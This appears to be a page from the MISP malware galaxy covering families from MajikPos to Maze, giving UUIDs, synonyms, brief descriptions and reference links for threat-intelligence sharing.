- https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MajikPos
Internal MISP references
UUID c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9
which can be used as unique global reference for MajikPos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Makadocs
Internal MISP references
UUID 996e73e9-b093-4987-9992-f52008e55b24
which can be used as unique global reference for Makadocs
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html - webarchive
- https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MakLoader
Internal MISP references
UUID 7e088669-3ddb-4cc5-bc9b-ae59f61ada82
which can be used as unique global reference for MakLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Makop
BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.
Internal MISP references
UUID db4ca498-5481-4b68-8024-edd51d552c38
which can be used as unique global reference for Makop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.makop - webarchive
- https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf - webarchive
- https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware - webarchive
- https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/ - webarchive
- https://twitter.com/siri_urz/status/1221797493849018368 - webarchive
- https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maktub
According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.
Internal MISP references
UUID bdb27944-1f79-46f7-a0d7-c344429790c2
which can be used as unique global reference for Maktub
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/ - webarchive
- https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/ - webarchive
- https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MalumPOS
Internal MISP references
UUID 159b0dbf-52f6-4690-a545-0f890ba7b9b7
which can be used as unique global reference for MalumPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mamba
According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the ".mamba" extension plus the victim's unique ID and developer's email address.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mamba.
Known Synonyms |
---|
DiskCryptor |
HDDCryptor |
Internal MISP references
UUID df320366-7970-4af0-b1f4-9f9492dede53
which can be used as unique global reference for Mamba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/ - webarchive
- https://www.ic3.gov/Media/News/2021/210323.pdf - webarchive
- https://securelist.com/the-return-of-mamba-ransomware/79403/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ManameCrypt
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ManameCrypt.
Known Synonyms |
---|
CryptoHost |
Internal MISP references
UUID 54cd671e-b7e4-4dd3-9bfa-dc0ba5105944
which can be used as unique global reference for ManameCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt - webarchive
- https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route - webarchive
- https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mango
Internal MISP references
UUID e3be5820-5cf9-4455-9b46-c88e7fbebd85
which can be used as unique global reference for Mango
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mangzamel
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mangzamel.
Known Synonyms |
---|
junidor |
mengkite |
vedratve |
Internal MISP references
UUID ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0
which can be used as unique global reference for Mangzamel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel - webarchive
- https://www.youtube.com/watch?v=NFJqD-LcpIg - webarchive
- https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Manifestus
Internal MISP references
UUID 5b75db42-b8f2-4e52-81d3-f329e49e1af2
which can be used as unique global reference for Manifestus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ManItsMe
Internal MISP references
UUID 13b0d9ff-0be0-4539-8c86-dfca7a0e79f6
which can be used as unique global reference for ManItsMe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Manjusaka (Windows)
Cisco Talos compared this RAT to Cobalt Strike and Sliver. It is written in Rust.
Internal MISP references
UUID 402a569c-6fc1-4ba3-b570-f85ce7538eef
which can be used as unique global reference for Manjusaka (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maoloa
Ransomware family closely related to GlobeImposter, notable for its use of the SHACAL-2 encryption algorithm.
Internal MISP references
UUID 9fe92a48-6822-4ec0-b52b-d089f98590ec
which can be used as unique global reference for Maoloa
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa - webarchive
- https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/ - webarchive
- https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html - webarchive
- https://www.sangfor.com/blog/cybersecurity/alert-new-globeimposter-olympian-gods-20-coming - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MAPIget
Internal MISP references
UUID 8a97307f-a029-4c43-88e1-debed2b80b14
which can be used as unique global reference for MAPIget
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Marap
Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.
Internal MISP references
UUID c2c3ac24-6921-4bba-a2c8-ac3d364feaeb
which can be used as unique global reference for Marap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.marap - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mariposa
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mariposa.
Known Synonyms |
---|
Autorun |
Palevo |
Rimecud |
Internal MISP references
UUID 6adb6fa0-1974-4d24-9c39-e76d5356cf6a
which can be used as unique global reference for Mariposa
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa - webarchive
- https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/ - webarchive
- https://defintel.com/docs/Mariposa_Analysis.pdf - webarchive
- https://www.us-cert.gov/ics/advisories/ICSA-10-090-01 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MarkiRAT
Internal MISP references
UUID c19ac191-a881-437f-ae82-7bec174590cb
which can be used as unique global reference for MarkiRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MarraCrypt
Internal MISP references
UUID bbe77240-d8e5-41b5-88ac-e9a91aa54a13
which can be used as unique global reference for MarraCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mars
Ransomware written in Delphi.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mars.
Known Synonyms |
---|
MarsDecrypt |
Internal MISP references
UUID 0b71ab98-912a-47a5-a1e0-1d7bd4fe9a4e
which can be used as unique global reference for Mars
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mars Stealer
3xp0rt describes Mars Stealer as an improved successor of Oski Stealer, supporting stealing from current browsers and targeting cryptocurrencies and 2FA plugins.
Internal MISP references
UUID a5c1a9bd-5c1c-4987-8844-2c38e7b83507
which can be used as unique global reference for Mars Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468 - webarchive
- https://3xp0rt.com/posts/mars-stealer - webarchive
- https://blog.sekoia.io/mars-a-red-hot-information-stealer/ - webarchive
- https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer - webarchive
- https://cyberint.com/blog/research/mars-stealer/ - webarchive
- https://isc.sans.edu/diary/rss/28468 - webarchive
- https://x-junior.github.io/malware%20analysis/2022/05/19/MarsStealer.html - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ - webarchive
- https://viuleeenz.github.io/posts/2023/11/applied-emulation-analysis-of-marsstealer/ - webarchive
- https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/ - webarchive
- https://x-junior.github.io/malware%20analysis/MarsStealer/ - webarchive
- https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view - webarchive
- https://threatmon.io/mars-stealer-malware-analysis-threatmon/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/ - webarchive
- https://cert.gov.ua/article/38606 - webarchive
- https://blog.morphisec.com/threat-research-mars-stealer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Masad Stealer
Internal MISP references
UUID 8a85df9f-5295-4570-948a-67c2489bdd2d
which can be used as unique global reference for Masad Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MASS Logger
MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.
Internal MISP references
UUID e1a09bf8-974a-4cc4-9ffd-758bed7a785e
which can be used as unique global reference for MASS Logger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger - webarchive
- https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/ - webarchive
- https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/ - webarchive
- https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html - webarchive
- https://fr3d.hk/blog/masslogger-frankenstein-s-creation - webarchive
- https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7 - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/ - webarchive
- https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html - webarchive
- https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger - webarchive
- https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html - webarchive
- https://twitter.com/pancak3lullz/status/1255893734241304576 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matanbuchus
According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.
Since it is used as a MaaS, both the malware it infiltrates into systems and the motives behind an attack can vary, depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.
Internal MISP references
UUID e30f2243-9e69-4b09-97ab-1643929b97ad
which can be used as unique global reference for Matanbuchus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus - webarchive
- https://www.cyberark.com/resources/all-blog-posts/inside-matanbuchus-a-quirky-loader - webarchive
- https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/ - webarchive
- https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn - webarchive
- https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a - webarchive
- https://www.embeeresearch.io/tls-certificates-for-threat-intel-dns/ - webarchive
- https://isc.sans.edu/diary/rss/28752 - webarchive
- https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer - webarchive
- https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/ - webarchive
- https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/04/TLP-CLEAR-Matanbuchus-Co-Code-Emulation-and-Cybercrime-Infrastructure-Discovery-1.pdf - webarchive
- https://blog.cyber5w.com/matanbuchus-loader-analysis - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matiex
Matiex Keylogger is being sold in underground forums, where it has gained popularity, and can also be used as MaaS (Malware-as-a-Service) because of its ease of use, competitive pricing and immediate response from support.
Internal MISP references
UUID b946f5d5-6503-471a-b3cd-c6c6d6149768
which can be used as unique global reference for Matiex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matrix Banker
Internal MISP references
UUID 59717468-271e-4d15-859a-130681c17ddb
which can be used as unique global reference for Matrix Banker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matrix Ransom
Matrix is a ransomware that encrypts a victim's files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim's data.
Internal MISP references
UUID 118ced99-5942-497f-885a-2b25d0569b4b
which can be used as unique global reference for Matrix Ransom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://unit42.paloaltonetworks.com/matrix-ransomware/ - webarchive
- https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf - webarchive
- https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware - webarchive
- https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matryoshka RAT
Internal MISP references
UUID c8a7c6e7-c6d3-4978-8a1d-190162de5e0d
which can be used as unique global reference for Matryoshka RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matsnu
Internal MISP references
UUID f566d597-d0c4-4932-b738-ac5774eedb7a
which can be used as unique global reference for Matsnu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maudi
Specialized PoisonIvy Sideloader.
Internal MISP references
UUID feb5ac55-7b28-47aa-9e9e-5007d838c0d5
which can be used as unique global reference for Maudi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maui Ransomware
Internal MISP references
UUID 0a531358-f943-40f9-a41d-e5e7944a9619
which can be used as unique global reference for Maui Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.maui - webarchive
- https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-187a - webarchive
- https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/aa22-187a-north-korean%20state-sponsored-cyber-actors-use-maui-ransomware-to-target-the-hph-sector.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maxtrilha
Banking trojan written in Delphi, targeting customers of European and South American banks.
Internal MISP references
UUID 65799ce1-793d-4730-8d80-d829d7619dc6
which can be used as unique global reference for Maxtrilha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maze
Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the victim's ID. The ransom note is placed inside a text file and an htm file. A few different, randomly generated extensions are appended to files.
Actors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout).
The code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Maze.
Known Synonyms |
---|
ChaCha |
Internal MISP references
UUID 266c9377-34ef-4670-afa3-28bc0ba7f44e
which can be used as unique global reference for Maze
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.maze - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/ - webarchive
- https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-village - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://twitter.com/certbund/status/1192756294307995655 - webarchive
- https://www.justice.gov/opa/pr/foreign-national-pleads-guilty-role-cybercrime-schemes-involving-tens-millions-dollars - webarchive
- https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/ - webarchive
- https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update - webarchive
- https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/ - webarchive
- https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF - webarchive
- https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/ - webarchive
- https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/ - webarchive
- https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://nattothoughts.substack.com/p/ransom-war-russian-extortion-operations - webarchive
- https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/ - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/ - webarchive
- https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/ - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md - webarchive
- https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f - webarchive
- https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/ - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- https://oag.ca.gov/system/files/Letter%204.pdf - webarchive
- https://www.docdroid.net/dUpPY5s/maze.pdf - webarchive
- https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/ - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/ - webarchive
- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html - webarchive
- https://adversary.crowdstrike.com/adversary/twisted-spider/ - webarchive
- https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-village - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/ - webarchive
- https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/ - webarchive
- https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us - webarchive
- https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://securelist.com/maze-ransomware/99137/ - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html - webarchive
- https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/ - webarchive
- https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U - webarchive
- https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/ - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/ - webarchive
- https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis - webarchive
- https://securelist.com/targeted-ransomware-encrypting-data/99255/ - webarchive
- https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/ - webarchive
